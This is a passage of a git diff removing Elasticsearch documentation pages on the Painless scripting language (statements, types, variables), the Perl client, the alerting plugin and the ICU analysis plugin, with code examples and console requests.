@@ -[[painless-statements]] -=== Statements - -Painless supports all of Java's https://docs.oracle.com/javase/tutorial/java/nutsandbolts/flow.html[ -control flow statements] except the `switch` statement. - -==== Conditional statements - -===== If / Else - -[source,painless] ---------------------------------------------------------- -if (doc[item].size() == 0) { - // do something if "item" is missing -} else if (doc[item].value == 'something') { - // do something if "item" value is: something -} else { - // do something else -} ---------------------------------------------------------- - -==== Loop statements - -===== For - -Painless also supports the `for in` syntax: - -[source,painless] ---------------------------------------------------------- -for (def item : list) { - // do something -} ---------------------------------------------------------- - -[source,painless] ---------------------------------------------------------- -for (item in list) { - // do something -} ---------------------------------------------------------- - -===== While -[source,painless] ---------------------------------------------------------- -while (ctx._source.item < condition) { - // do something -} ---------------------------------------------------------- - -===== Do-While -[source,painless] ---------------------------------------------------------- -do { - // do something -} -while (ctx._source.item < condition) ---------------------------------------------------------- diff --git a/docs/painless/painless-lang-spec/painless-types.asciidoc b/docs/painless/painless-lang-spec/painless-types.asciidoc deleted file mode 100644 index e58fec49d7c..00000000000 --- a/docs/painless/painless-lang-spec/painless-types.asciidoc +++ /dev/null @@ -1,473 +0,0 @@ -[[painless-types]] -=== Types - -A type is a classification of data used to define the properties of a value. 
-These properties specify what data a value represents and the rules for how a -value is evaluated during an <>. Each type -belongs to one of the following categories: <>, -<>, or <>. - -[[primitive-types]] -==== Primitive Types - -A primitive type represents basic data built natively into the JVM and is -allocated to non-heap memory. Declare a primitive type -<> or access a primitive type member field (from -a reference type instance), and assign it a primitive type value for evaluation -during later operations. The default value for a newly-declared primitive type -variable is listed as part of the definitions below. A primitive type value is -copied during an assignment or as an argument for a method/function call. - -A primitive type has a corresponding reference type (also known as a boxed -type). Use the <> or -<> on a primitive type value to -force evaluation as its corresponding reference type value. - -The following primitive types are available: - -[horizontal] -`byte`:: -8-bit, signed, two's complement integer -* range: [`-128`, `127`] -* default value: `0` -* reference type: `Byte` - -`short`:: -16-bit, signed, two's complement integer -* range: [`-32768`, `32767`] -* default value: `0` -* reference type: `Short` - -`char`:: -16-bit, unsigned, Unicode character -* range: [`0`, `65535`] -* default value: `0` or `\u0000` -* reference type: `Character` - -`int`:: -32-bit, signed, two's complement integer -* range: [`-2^31`, `2^31-1`] -* default value: `0` -* reference type: `Integer` - -`long`:: -64-bit, signed, two's complement integer -* range: [`-2^63`, `2^63-1`] -* default value: `0` -* reference type: `Long` - -`float`:: -32-bit, signed, single-precision, IEEE 754 floating point number -* default value: `0.0` -* reference type: `Float` - -`double`:: -64-bit, signed, double-precision, IEEE 754 floating point number -* default value: `0.0` -* reference type: `Double` - -`boolean`:: -logical quantity with two possible values of `true` and `false` -* default value: `false` -* reference type: `Boolean` - -*Examples* - -* Primitive types used in declaration, declaration and assignment. -+ -[source,Painless] ----- -int i = 1; <1> -double d; <2> -boolean b = true; <3> ----- -+ -<1> declare `int i`; - store `int 1` to `i` -<2> declare `double d`; - store default `double 0.0` to `d` -<3> declare `boolean b`; - store `boolean true` to `b` -+ -* Method call on a primitive type using the corresponding reference type. -+ -[source,Painless] ----- -int i = 1; <1> -i.toString(); <2> ----- -+ -<1> declare `int i`; - store `int 1` to `i` -<2> load from `i` -> `int 1`; - box `int 1` -> `Integer 1 reference`; - call `toString` on `Integer 1 reference` -> `String '1'` - -[[reference-types]] -==== Reference Types - -A reference type is a named construct (object), potentially representing -multiple pieces of data (member fields) and logic to manipulate that data -(member methods), defined as part of the application programming interface -(API) for scripts. - -A reference type instance is a single set of data for one reference type -object allocated to the heap. Use the -<> to allocate a reference type -instance. Use a reference type instance to load from, store to, and manipulate -complex data. - -A reference type value refers to a reference type instance, and multiple -reference type values may refer to the same reference type instance. A change to -a reference type instance will affect all reference type values referring to -that specific instance. 
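-
-As a minimal illustration of this sharing behavior (a sketch only; the `Map`
-and `HashMap` types are used here as convenient stand-ins), a change made
-through one reference type value is visible through every other reference type
-value that refers to the same instance:
-
-[source,Painless]
-----
-Map a = new HashMap(); // one HashMap instance allocated to the heap
-Map b = a;             // b refers to the same instance as a
-a.put(1, 2);           // store through a
-int i = b.get(1);      // load through b -> int 2
-----
-
-An annotated walkthrough of instance sharing appears in the examples later in
-this section.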
- -Declare a reference type <> or access a reference -type member field (from a reference type instance), and assign it a reference -type value for evaluation during later operations. The default value for a -newly-declared reference type variable is `null`. A reference type value is -shallow-copied during an assignment or as an argument for a method/function -call. Assign `null` to a reference type variable to indicate the reference type -value refers to no reference type instance. The JVM will garbage collect a -reference type instance when it is no longer referred to by any reference type -values. Pass `null` as an argument to a method/function call to indicate the -argument refers to no reference type instance. - -A reference type object defines zero-to-many of each of the following: - -static member field:: - -A static member field is a named and typed piece of data. Each reference type -*object* contains one set of data representative of its static member fields. -Use the <> in correspondence with -the reference type object name to access a static member field for loading and -storing to a specific reference type *object*. No reference type instance -allocation is necessary to use a static member field. - -non-static member field:: - -A non-static member field is a named and typed piece of data. Each reference -type *instance* contains one set of data representative of its reference type -object's non-static member fields. Use the -<> for loading and storing to a -non-static member field of a specific reference type *instance*. An allocated -reference type instance is required to use a non-static member field. - -static member method:: - -A static member method is a <> called on a -reference type *object*. Use the <> -in correspondence with the reference type object name to call a static member -method. No reference type instance allocation is necessary to use a static -member method. - -non-static member method:: - -A non-static member method is a <> called on a -reference type *instance*. A non-static member method called on a reference type -instance can load from and store to non-static member fields of that specific -reference type instance. Use the <> -in correspondence with a specific reference type instance to call a non-static -member method. An allocated reference type instance is required to use a -non-static member method. - -constructor:: - -A constructor is a special type of <> used to -allocate a reference type *instance* defined by a specific reference type -*object*. Use the <> to allocate -a reference type instance. - -A reference type object follows a basic inheritance model. Consider types A and -B. Type A is considered to be a parent of B, and B a child of A, if B inherits -(is able to access as its own) all of A's non-static members. Type B is -considered a descendant of A if there exists a recursive parent-child -relationship from B to A with none to many types in between. In this case, B -inherits all of A's non-static members along with all of the non-static members -of the types in between. Type B is also considered to be a type A in both -relationships. - -*Examples* - -* Reference types evaluated in several different operations. 
-+ -[source,Painless] ----- -List l = new ArrayList(); <1> -l.add(1); <2> -int i = l.get(0) + 2; <3> ----- -+ -<1> declare `List l`; - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `List reference` -> `List reference`; - store `List reference` to `l` -<2> load from `l` -> `List reference`; - implicit cast `int 1` to `def` -> `def` - call `add` on `List reference` with arguments (`def`) -<3> declare `int i`; - load from `l` -> `List reference`; - call `get` on `List reference` with arguments (`int 0`) -> `def`; - implicit cast `def` to `int 1` -> `int 1`; - add `int 1` and `int 2` -> `int 3`; - store `int 3` to `i` -+ -* Sharing a reference type instance. -+ -[source,Painless] ----- -List l0 = new ArrayList(); <1> -List l1 = l0; <2> -l0.add(1); <3> -l1.add(2); <4> -int i = l1.get(0) + l0.get(1); <5> ----- -+ -<1> declare `List l0`; - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `List reference` -> `List reference`; - store `List reference` to `l0` -<2> declare `List l1`; - load from `l0` -> `List reference`; - store `List reference` to `l1` - (note `l0` and `l1` refer to the same instance known as a shallow-copy) -<3> load from `l0` -> `List reference`; - implicit cast `int 1` to `def` -> `def` - call `add` on `List reference` with arguments (`def`) -<4> load from `l1` -> `List reference`; - implicit cast `int 2` to `def` -> `def` - call `add` on `List reference` with arguments (`def`) -<5> declare `int i`; - load from `l0` -> `List reference`; - call `get` on `List reference` with arguments (`int 0`) -> `def @0`; - implicit cast `def @0` to `int 1` -> `int 1`; - load from `l1` -> `List reference`; - call `get` on `List reference` with arguments (`int 1`) -> `def @1`; - implicit cast `def @1` to `int 2` -> `int 2`; - add `int 1` and `int 2` -> `int 3`; - store `int 3` to `i`; -+ -* Using the static members of a reference type. -+ -[source,Painless] ----- -int i = Integer.MAX_VALUE; <1> -long l = Long.parseLong("123L"); <2> ----- -+ -<1> declare `int i`; - load from `MAX_VALUE` on `Integer` -> `int 2147483647`; - store `int 2147483647` to `i` -<2> declare `long l`; - call `parseLong` on `Long` with arguments (`long 123`) -> `long 123`; - store `long 123` to `l` - -[[dynamic-types]] -==== Dynamic Types - -A dynamic type value can represent the value of any primitive type or -reference type using a single type name `def`. A `def` type value mimics -the behavior of whatever value it represents at run-time and will always -represent the child-most descendant type value of any type value when evaluated -during operations. - -Declare a `def` type <> or access a `def` type -member field (from a reference type instance), and assign it any type of value -for evaluation during later operations. The default value for a newly-declared -`def` type variable is `null`. A `def` type variable or method/function -parameter can change the type it represents during the compilation and -evaluation of a script. - -Using the `def` type can have a slight impact on performance. Use only primitive -types and reference types directly when performance is critical. - -*Errors* - -* If a `def` type value represents an inappropriate type for evaluation of an - operation at run-time. - -*Examples* - -* General uses of the `def` type. 
-+ -[source,Painless] ----- -def dp = 1; <1> -def dr = new ArrayList(); <2> -dr = dp; <3> ----- -+ -<1> declare `def dp`; - implicit cast `int 1` to `def` -> `def`; - store `def` to `dp` -<2> declare `def dr`; - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `def` -> `def`; - store `def` to `dr` -<3> load from `dp` -> `def`; - store `def` to `dr`; - (note the switch in the type `dr` represents from `ArrayList` to `int`) -+ -* A `def` type value representing the child-most descendant of a value. -+ -[source,Painless] ----- -Object l = new ArrayList(); <1> -def d = l; <2> -d.ensureCapacity(10); <3> ----- -+ -<1> declare `Object l`; - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `Object reference` - -> `Object reference`; - store `Object reference` to `l` -<2> declare `def d`; - load from `l` -> `Object reference`; - implicit cast `Object reference` to `def` -> `def`; - store `def` to `d`; -<3> load from `d` -> `def`; - implicit cast `def` to `ArrayList reference` -> `ArrayList reference`; - call `ensureCapacity` on `ArrayList reference` with arguments (`int 10`); - (note `def` was implicit cast to `ArrayList reference` - since ArrayList` is the child-most descendant type value that the - `def` type value represents) - -[[string-type]] -==== String Type - -The `String` type is a specialized reference type that does not require -explicit allocation. Use a <> to directly -evaluate a `String` type value. While not required, the -<> can allocate `String` type -instances. - -*Examples* - -* General use of the `String` type. -+ -[source,Painless] ----- -String r = "some text"; <1> -String s = 'some text'; <2> -String t = new String("some text"); <3> -String u; <4> ----- -+ -<1> declare `String r`; - store `String "some text"` to `r` -<2> declare `String s`; - store `String 'some text'` to `s` -<3> declare `String t`; - allocate `String` instance with arguments (`String "some text"`) - -> `String "some text"`; - store `String "some text"` to `t` -<4> declare `String u`; - store default `null` to `u` - -[[void-type]] -==== void Type - -The `void` type represents the concept of a lack of type. Use the `void` type to -indicate a function returns no value. - -*Examples* - -* Use of the `void` type in a function. -+ -[source,Painless] ----- -void addToList(List l, def d) { - l.add(d); -} ----- - -[[array-type]] -==== Array Type - -An array type is a specialized reference type where an array type instance -contains a series of values allocated to the heap. Each value in an array type -instance is defined as an element. All elements in an array type instance are of -the same type (element type) specified as part of declaration. Each element is -assigned an index within the range `[0, length)` where length is the total -number of elements allocated for an array type instance. - -Use the <> or the -<> to allocate an -array type instance. Declare an array type <> or -access an array type member field (from a reference type instance), and assign -it an array type value for evaluation during later operations. The default value -for a newly-declared array type variable is `null`. An array type value is -shallow-copied during an assignment or as an argument for a method/function -call. Assign `null` to an array type variable to indicate the array type value -refers to no array type instance. The JVM will garbage collect an array type -instance when it is no longer referred to by any array type values. 
Pass `null` -as an argument to a method/function call to indicate the argument refers to no -array type instance. - -Use the <> to retrieve the length -of an array type value as an `int` type value. Use the -<> to load from and store to -an individual element within an array type instance. - -When an array type instance is allocated with multiple dimensions using the -range `[2, d]` where `d >= 2`, each element within each dimension in the range -`[1, d-1]` is also an array type. The element type of each dimension, `n`, is an -array type with the number of dimensions equal to `d-n`. For example, consider -`int[][][]` with 3 dimensions. Each element in the 3rd dimension, `d-3`, is the -primitive type `int`. Each element in the 2nd dimension, `d-2`, is the array -type `int[]`. And each element in the 1st dimension, `d-1` is the array type -`int[][]`. - -*Examples* - -* General use of single-dimensional arrays. -+ -[source,Painless] ----- -int[] x; <1> -float[] y = new float[10]; <2> -def z = new float[5]; <3> -y[9] = 1.0F; <4> -z[0] = y[9]; <5> ----- -+ -<1> declare `int[] x`; - store default `null` to `x` -<2> declare `float[] y`; - allocate `1-d float array` instance with `length [10]` - -> `1-d float array reference`; - store `1-d float array reference` to `y` -<3> declare `def z`; - allocate `1-d float array` instance with `length [5]` - -> `1-d float array reference`; - implicit cast `1-d float array reference` to `def` -> `def`; - store `def` to `z` -<4> load from `y` -> `1-d float array reference`; - store `float 1.0` to `index [9]` of `1-d float array reference` -<5> load from `y` -> `1-d float array reference @0`; - load from `index [9]` of `1-d float array reference @0` -> `float 1.0`; - load from `z` -> `def`; - implicit cast `def` to `1-d float array reference @1` - -> `1-d float array reference @1`; - store `float 1.0` to `index [0]` of `1-d float array reference @1` -+ -* General use of a multi-dimensional array. -+ -[source,Painless] ----- -int[][][] ia3 = new int[2][3][4]; <1> -ia3[1][2][3] = 99; <2> -int i = ia3[1][2][3]; <3> ----- -+ -<1> declare `int[][][] ia`; - allocate `3-d int array` instance with length `[2, 3, 4]` - -> `3-d int array reference`; - store `3-d int array reference` to `ia3` -<2> load from `ia3` -> `3-d int array reference`; - store `int 99` to `index [1, 2, 3]` of `3-d int array reference` -<3> declare `int i`; - load from `ia3` -> `3-d int array reference`; - load from `index [1, 2, 3]` of `3-d int array reference` -> `int 99`; - store `int 99` to `i` diff --git a/docs/painless/painless-lang-spec/painless-variables.asciidoc b/docs/painless/painless-lang-spec/painless-variables.asciidoc deleted file mode 100644 index d86b8ba1721..00000000000 --- a/docs/painless/painless-lang-spec/painless-variables.asciidoc +++ /dev/null @@ -1,204 +0,0 @@ -[[painless-variables]] -=== Variables - -A variable loads and stores a value for evaluation during -<>. - -[[variable-declaration]] -==== Declaration - -Declare a variable before use with the format of <> -followed by <>. Declare an -<> variable using an opening `[` token and a closing `]` -token for each dimension directly after the identifier. Specify a -comma-separated list of identifiers following the type to declare multiple -variables in a single statement. Use an -<> combined with a declaration to -immediately assign a value to a variable. A variable not immediately assigned a -value will have a default value assigned implicitly based on the type. 
- -*Errors* - -* If a variable is used prior to or without declaration. - -*Grammar* - -[source,ANTLR4] ----- -declaration : type ID assignment? (',' ID assignment?)*; -type: ID ('.' ID)* ('[' ']')*; -assignment: '=' expression; ----- - -*Examples* - -* Different variations of variable declaration. -+ -[source,Painless] ----- -int x; <1> -List y; <2> -int x, y = 5, z; <3> -def d; <4> -int i = 10; <5> -float[] f; <6> -Map[][] m; <7> ----- -+ -<1> declare `int x`; - store default `null` to `x` -<2> declare `List y`; - store default `null` to `y` -<3> declare `int x`; - store default `int 0` to `x`; - declare `int y`; - store `int 5` to `y`; - declare `int z`; - store default `int 0` to `z`; -<4> declare `def d`; - store default `null` to `d` -<5> declare `int i`; - store `int 10` to `i` -<6> declare `float[] f`; - store default `null` to `f` -<7> declare `Map[][] m`; - store default `null` to `m` - -[[variable-assignment]] -==== Assignment - -Use the `assignment operator '='` to store a value in a variable for use in -subsequent operations. Any operation that produces a value can be assigned to -any variable as long as the <> are the same or the -resultant type can be <> to the variable -type. - -*Errors* - -* If the type of value is unable to match the type of variable. - -*Grammar* - -[source,ANTLR4] ----- -assignment: ID '=' expression ----- - -*Examples* - -* Variable assignment with an integer literal. -+ -[source,Painless] ----- -int i; <1> -i = 10; <2> ----- -+ -<1> declare `int i`; - store default `int 0` to `i` -<2> store `int 10` to `i` -+ -* Declaration combined with immediate assignment. -+ -[source,Painless] ----- -int i = 10; <1> -double j = 2.0; <2> ----- -+ -<1> declare `int i`; - store `int 10` to `i` -<2> declare `double j`; - store `double 2.0` to `j` -+ -* Assignment of one variable to another using primitive type values. -+ -[source,Painless] ----- -int i = 10; <1> -int j = i; <2> ----- -+ -<1> declare `int i`; - store `int 10` to `i` -<2> declare `int j`; - load from `i` -> `int 10`; - store `int 10` to `j` -+ -* Assignment with reference types using the - <>. -+ -[source,Painless] ----- -ArrayList l = new ArrayList(); <1> -Map m = new HashMap(); <2> ----- -+ -<1> declare `ArrayList l`; - allocate `ArrayList` instance -> `ArrayList reference`; - store `ArrayList reference` to `l` -<2> declare `Map m`; - allocate `HashMap` instance -> `HashMap reference`; - implicit cast `HashMap reference` to `Map reference` -> `Map reference`; - store `Map reference` to `m` -+ -* Assignment of one variable to another using reference type values. -+ -[source,Painless] ----- -List l = new ArrayList(); <1> -List k = l; <2> -List m; <3> -m = k; <4> ----- -+ -<1> declare `List l`; - allocate `ArrayList` instance -> `ArrayList reference`; - implicit cast `ArrayList reference` to `List reference` -> `List reference`; - store `List reference` to `l` -<2> declare `List k`; - load from `l` -> `List reference`; - store `List reference` to `k`; - (note `l` and `k` refer to the same instance known as a shallow-copy) -<3> declare `List m`; - store default `null` to `m` -<4> load from `k` -> `List reference`; - store `List reference` to `m`; - (note `l`, `k`, and `m` refer to the same instance) -+ -* Assignment with array type variables using the - <>. 
-+ -[source,Painless] ----- -int[] ia1; <1> -ia1 = new int[2]; <2> -ia1[0] = 1; <3> -int[] ib1 = ia1; <4> -int[][] ic2 = new int[2][5]; <5> -ic2[1][3] = 2; <6> -ic2[0] = ia1; <7> ----- -+ -<1> declare `int[] ia1`; - store default `null` to `ia1` -<2> allocate `1-d int array` instance with `length [2]` - -> `1-d int array reference`; - store `1-d int array reference` to `ia1` -<3> load from `ia1` -> `1-d int array reference`; - store `int 1` to `index [0]` of `1-d int array reference` -<4> declare `int[] ib1`; - load from `ia1` -> `1-d int array reference`; - store `1-d int array reference` to `ib1`; - (note `ia1` and `ib1` refer to the same instance known as a shallow copy) -<5> declare `int[][] ic2`; - allocate `2-d int array` instance with `length [2, 5]` - -> `2-d int array reference`; - store `2-d int array reference` to `ic2` -<6> load from `ic2` -> `2-d int array reference`; - store `int 2` to `index [1, 3]` of `2-d int array reference` -<7> load from `ia1` -> `1-d int array reference`; - load from `ic2` -> `2-d int array reference`; - store `1-d int array reference` to - `index [0]` of `2-d int array reference`; - (note `ia1`, `ib1`, and `index [0]` of `ia2` refer to the same instance) diff --git a/docs/painless/redirects.asciidoc b/docs/painless/redirects.asciidoc deleted file mode 100644 index 94dd5524e9a..00000000000 --- a/docs/painless/redirects.asciidoc +++ /dev/null @@ -1,9 +0,0 @@ -["appendix",role="exclude",id="redirects"] -= Deleted pages - -The following pages have moved or been deleted. - -[role="exclude",id="painless-examples"] -=== Painless examples - -See <>. \ No newline at end of file diff --git a/docs/perl/index.asciidoc b/docs/perl/index.asciidoc deleted file mode 100644 index d009b3d0460..00000000000 --- a/docs/perl/index.asciidoc +++ /dev/null @@ -1,124 +0,0 @@ -= Elasticsearch.pm - -== Overview - -Search::Elasticsearch is the official Perl API for Elasticsearch. The full -documentation is available on https://metacpan.org/module/Search::Elasticsearch. - -It can be installed with: - -[source,sh] ------------------------------------- -cpanm Search::Elasticsearch ------------------------------------- - -=== Features - -This client provides: - -* Full support for all Elasticsearch APIs - -* HTTP backend (blocking and asynchronous with https://metacpan.org/module/Search::Elasticsearch::Async) - -* Robust networking support which handles load balancing, failure detection and failover - -* Good defaults - -* Helper utilities for more complex operations, such as bulk indexing, scrolled searches and reindexing. 
- -* Logging support via Log::Any - -* Compatibility with the official clients for Python, Ruby, PHP and JavaScript - -* Easy extensibility - -== Synopsis - -[source,perl] ------------------------------------- -use Search::Elasticsearch; - -# Connect to localhost:9200: -my $e = Search::Elasticsearch->new(); - -# Round-robin between two nodes: -my $e = Search::Elasticsearch->new( - nodes => [ - 'search1:9200', - 'search2:9200' - ] -); - -# Connect to cluster at search1:9200, sniff all nodes and round-robin between them: -my $e = Search::Elasticsearch->new( - nodes => 'search1:9200', - cxn_pool => 'Sniff' -); - -# Index a document: -$e->index( - index => 'my_app', - type => 'blog_post', - id => 1, - body => { - title => 'Elasticsearch clients', - content => 'Interesting content...', - date => '2014-09-24' - } -); - -# Get the document: -my $doc = $e->get( - index => 'my_app', - type => 'blog_post', - id => 1 -); - -# Search: -my $results = $e->search( - index => 'my_app', - body => { - query => { - match => { title => 'elasticsearch' } - } - } -); ------------------------------------- - -[[v0_90]] -== Elasticsearch 0.90.* and earlier - -The current version of the client supports the Elasticsearch 1.0 branch by -default, which is not backwards compatible with the 0.90 branch. - -If you need to talk to a version of Elasticsearch before 1.0.0, -please use `Search::Elasticsearch::Client::0_90::Direct` as follows: - -[source,perl] ------------------------------------- - $es = Search::Elasticsearch->new( - client => '0_90::Direct' - ); ------------------------------------- - - -== Reporting issues - -The GitHub repository is https://github.com/elastic/elasticsearch-perl -and any issues can be reported on the issues list at -https://github.com/elastic/elasticsearch-perl/issues. - -== Contributing - -Open source contributions are welcome. Please read our -https://github.com/elastic/elasticsearch-perl/blob/master/CONTRIBUTING.asciidoc[guide to contributing]. - -== Copyright and License - -This software is Copyright (c) 2013-2018 by Elasticsearch BV. - -This is free software, licensed under: -https://github.com/elastic/elasticsearch-perl/blob/master/LICENSE.txt[The Apache License Version 2.0]. - - - diff --git a/docs/plugins/alerting.asciidoc b/docs/plugins/alerting.asciidoc deleted file mode 100644 index a440b6b8367..00000000000 --- a/docs/plugins/alerting.asciidoc +++ /dev/null @@ -1,17 +0,0 @@ -[[alerting]] -== Alerting Plugins - -Alerting plugins allow Elasticsearch to monitor indices and to trigger alerts when thresholds are breached. - -[discrete] -=== Core alerting plugins - -The core alerting plugins are: - -link:/products/x-pack/alerting[X-Pack]:: - -X-Pack contains the alerting and notification product for Elasticsearch that -lets you take action based on changes in your data. It is designed around the -principle that if you can query something in Elasticsearch, you can alert on -it. Simply define a query, condition, schedule, and the actions to take, and -X-Pack will do the rest. 
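To make the "query, condition, schedule, actions" flow concrete, here is a
minimal sketch of a watch definition. It is only a sketch: it assumes X-Pack
(Watcher) is installed and that a `logs-*` index pattern with a `message`
field exists; the interval, query, and action shown are purely illustrative.

[source,console]
--------------------------------------------------
PUT _watcher/watch/log_error_watch
{
  "trigger": {
    "schedule": { "interval": "10m" } <1>
  },
  "input": {
    "search": { <2>
      "request": {
        "indices": [ "logs-*" ],
        "body": {
          "query": { "match": { "message": "error" } }
        }
      }
    }
  },
  "condition": {
    "compare": { "ctx.payload.hits.total": { "gt": 0 } } <3>
  },
  "actions": {
    "log_error": {
      "logging": { "text": "Found {{ctx.payload.hits.total}} errors" } <4>
    }
  }
}
--------------------------------------------------

<1> The schedule: run the watch every 10 minutes.
<2> The query: search the (assumed) `logs-*` indices for documents containing `error`.
<3> The condition: only fire when the search returns at least one hit.
<4> The action: a simple log message here; email, webhook, and other actions are also available.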
diff --git a/docs/plugins/analysis-icu.asciidoc b/docs/plugins/analysis-icu.asciidoc deleted file mode 100644 index a8041e47100..00000000000 --- a/docs/plugins/analysis-icu.asciidoc +++ /dev/null @@ -1,557 +0,0 @@ -[[analysis-icu]] -=== ICU Analysis Plugin - -The ICU Analysis plugin integrates the Lucene ICU module into {es}, -adding extended Unicode support using the http://site.icu-project.org/[ICU] -libraries, including better analysis of Asian languages, Unicode -normalization, Unicode-aware case folding, collation support, and -transliteration. - -[IMPORTANT] -.ICU analysis and backwards compatibility -================================================ - -From time to time, the ICU library receives updates such as adding new -characters and emojis, and improving collation (sort) orders. These changes -may or may not affect search and sort orders, depending on which characters -sets you are using. - -While we restrict ICU upgrades to major versions, you may find that an index -created in the previous major version will need to be reindexed in order to -return correct (and correctly ordered) results, and to take advantage of new -characters. - -================================================ - -:plugin_name: analysis-icu -include::install_remove.asciidoc[] - -[[analysis-icu-analyzer]] -==== ICU Analyzer - -The `icu_analyzer` analyzer performs basic normalization, tokenization and character folding, using the -`icu_normalizer` char filter, `icu_tokenizer` and `icu_folding` token filter - -The following parameters are accepted: - -[horizontal] - -`method`:: - - Normalization method. Accepts `nfkc`, `nfc` or `nfkc_cf` (default) - -`mode`:: - - Normalization mode. Accepts `compose` (default) or `decompose`. - -[[analysis-icu-normalization-charfilter]] -==== ICU Normalization Character Filter - -Normalizes characters as explained -http://userguide.icu-project.org/transforms/normalization[here]. -It registers itself as the `icu_normalizer` character filter, which is -available to all indices without any further configuration. The type of -normalization can be specified with the `name` parameter, which accepts `nfc`, -`nfkc`, and `nfkc_cf` (default). Set the `mode` parameter to `decompose` to -convert `nfc` to `nfd` or `nfkc` to `nfkd` respectively: - -Which letters are normalized can be controlled by specifying the -`unicode_set_filter` parameter, which accepts a -https://icu-project.org/apiref/icu4j/com/ibm/icu/text/UnicodeSet.html[UnicodeSet]. - -Here are two examples, the default usage and a customised character filter: - - -[source,console] --------------------------------------------------- -PUT icu_sample -{ - "settings": { - "index": { - "analysis": { - "analyzer": { - "nfkc_cf_normalized": { <1> - "tokenizer": "icu_tokenizer", - "char_filter": [ - "icu_normalizer" - ] - }, - "nfd_normalized": { <2> - "tokenizer": "icu_tokenizer", - "char_filter": [ - "nfd_normalizer" - ] - } - }, - "char_filter": { - "nfd_normalizer": { - "type": "icu_normalizer", - "name": "nfc", - "mode": "decompose" - } - } - } - } - } -} --------------------------------------------------- - -<1> Uses the default `nfkc_cf` normalization. -<2> Uses the customized `nfd_normalizer` token filter, which is set to use `nfc` normalization with decomposition. - -[[analysis-icu-tokenizer]] -==== ICU Tokenizer - -Tokenizes text into words on word boundaries, as defined in -https://www.unicode.org/reports/tr29/[UAX #29: Unicode Text Segmentation]. 
-It behaves much like the {ref}/analysis-standard-tokenizer.html[`standard` tokenizer], -but adds better support for some Asian languages by using a dictionary-based -approach to identify words in Thai, Lao, Chinese, Japanese, and Korean, and -using custom rules to break Myanmar and Khmer text into syllables. - -[source,console] --------------------------------------------------- -PUT icu_sample -{ - "settings": { - "index": { - "analysis": { - "analyzer": { - "my_icu_analyzer": { - "tokenizer": "icu_tokenizer" - } - } - } - } - } -} --------------------------------------------------- - -===== Rules customization - -experimental[This functionality is marked as experimental in Lucene] - -You can customize the `icu-tokenizer` behavior by specifying per-script rule files, see the -http://userguide.icu-project.org/boundaryanalysis#TOC-RBBI-Rules[RBBI rules syntax reference] -for a more detailed explanation. - -To add icu tokenizer rules, set the `rule_files` settings, which should contain a comma-separated list of -`code:rulefile` pairs in the following format: -https://unicode.org/iso15924/iso15924-codes.html[four-letter ISO 15924 script code], -followed by a colon, then a rule file name. Rule files are placed `ES_HOME/config` directory. - -As a demonstration of how the rule files can be used, save the following user file to `$ES_HOME/config/KeywordTokenizer.rbbi`: - -[source,text] ------------------------ -.+ {200}; ------------------------ - -Then create an analyzer to use this rule file as follows: - -[source,console] --------------------------------------------------- -PUT icu_sample -{ - "settings": { - "index": { - "analysis": { - "tokenizer": { - "icu_user_file": { - "type": "icu_tokenizer", - "rule_files": "Latn:KeywordTokenizer.rbbi" - } - }, - "analyzer": { - "my_analyzer": { - "type": "custom", - "tokenizer": "icu_user_file" - } - } - } - } - } -} - -GET icu_sample/_analyze -{ - "analyzer": "my_analyzer", - "text": "Elasticsearch. Wow!" -} --------------------------------------------------- - -The above `analyze` request returns the following: - -[source,console-result] --------------------------------------------------- -{ - "tokens": [ - { - "token": "Elasticsearch. Wow!", - "start_offset": 0, - "end_offset": 19, - "type": "", - "position": 0 - } - ] -} --------------------------------------------------- - - -[[analysis-icu-normalization]] -==== ICU Normalization Token Filter - -Normalizes characters as explained -http://userguide.icu-project.org/transforms/normalization[here]. It registers -itself as the `icu_normalizer` token filter, which is available to all indices -without any further configuration. The type of normalization can be specified -with the `name` parameter, which accepts `nfc`, `nfkc`, and `nfkc_cf` -(default). - -Which letters are normalized can be controlled by specifying the -`unicode_set_filter` parameter, which accepts a -https://icu-project.org/apiref/icu4j/com/ibm/icu/text/UnicodeSet.html[UnicodeSet]. - -You should probably prefer the <>. 
- -Here are two examples, the default usage and a customised token filter: - -[source,console] --------------------------------------------------- -PUT icu_sample -{ - "settings": { - "index": { - "analysis": { - "analyzer": { - "nfkc_cf_normalized": { <1> - "tokenizer": "icu_tokenizer", - "filter": [ - "icu_normalizer" - ] - }, - "nfc_normalized": { <2> - "tokenizer": "icu_tokenizer", - "filter": [ - "nfc_normalizer" - ] - } - }, - "filter": { - "nfc_normalizer": { - "type": "icu_normalizer", - "name": "nfc" - } - } - } - } - } -} --------------------------------------------------- - -<1> Uses the default `nfkc_cf` normalization. -<2> Uses the customized `nfc_normalizer` token filter, which is set to use `nfc` normalization. - - -[[analysis-icu-folding]] -==== ICU Folding Token Filter - -Case folding of Unicode characters based on `UTR#30`, like the -{ref}/analysis-asciifolding-tokenfilter.html[ASCII-folding token filter] -on steroids. It registers itself as the `icu_folding` token filter and is -available to all indices: - -[source,console] --------------------------------------------------- -PUT icu_sample -{ - "settings": { - "index": { - "analysis": { - "analyzer": { - "folded": { - "tokenizer": "icu_tokenizer", - "filter": [ - "icu_folding" - ] - } - } - } - } - } -} --------------------------------------------------- - -The ICU folding token filter already does Unicode normalization, so there is -no need to use Normalize character or token filter as well. - -Which letters are folded can be controlled by specifying the -`unicode_set_filter` parameter, which accepts a -https://icu-project.org/apiref/icu4j/com/ibm/icu/text/UnicodeSet.html[UnicodeSet]. - -The following example exempts Swedish characters from folding. It is important -to note that both upper and lowercase forms should be specified, and that -these filtered character are not lowercased which is why we add the -`lowercase` filter as well: - -[source,console] --------------------------------------------------- -PUT icu_sample -{ - "settings": { - "index": { - "analysis": { - "analyzer": { - "swedish_analyzer": { - "tokenizer": "icu_tokenizer", - "filter": [ - "swedish_folding", - "lowercase" - ] - } - }, - "filter": { - "swedish_folding": { - "type": "icu_folding", - "unicode_set_filter": "[^åäöÅÄÖ]" - } - } - } - } - } -} --------------------------------------------------- - - -[[analysis-icu-collation]] -==== ICU Collation Token Filter - -[WARNING] -====== -This token filter has been deprecated since Lucene 5.0. Please use -<>. -====== - -[[analysis-icu-collation-keyword-field]] -==== ICU Collation Keyword Field - -Collations are used for sorting documents in a language-specific word order. -The `icu_collation_keyword` field type is available to all indices and will encode -the terms directly as bytes in a doc values field and a single indexed token just -like a standard 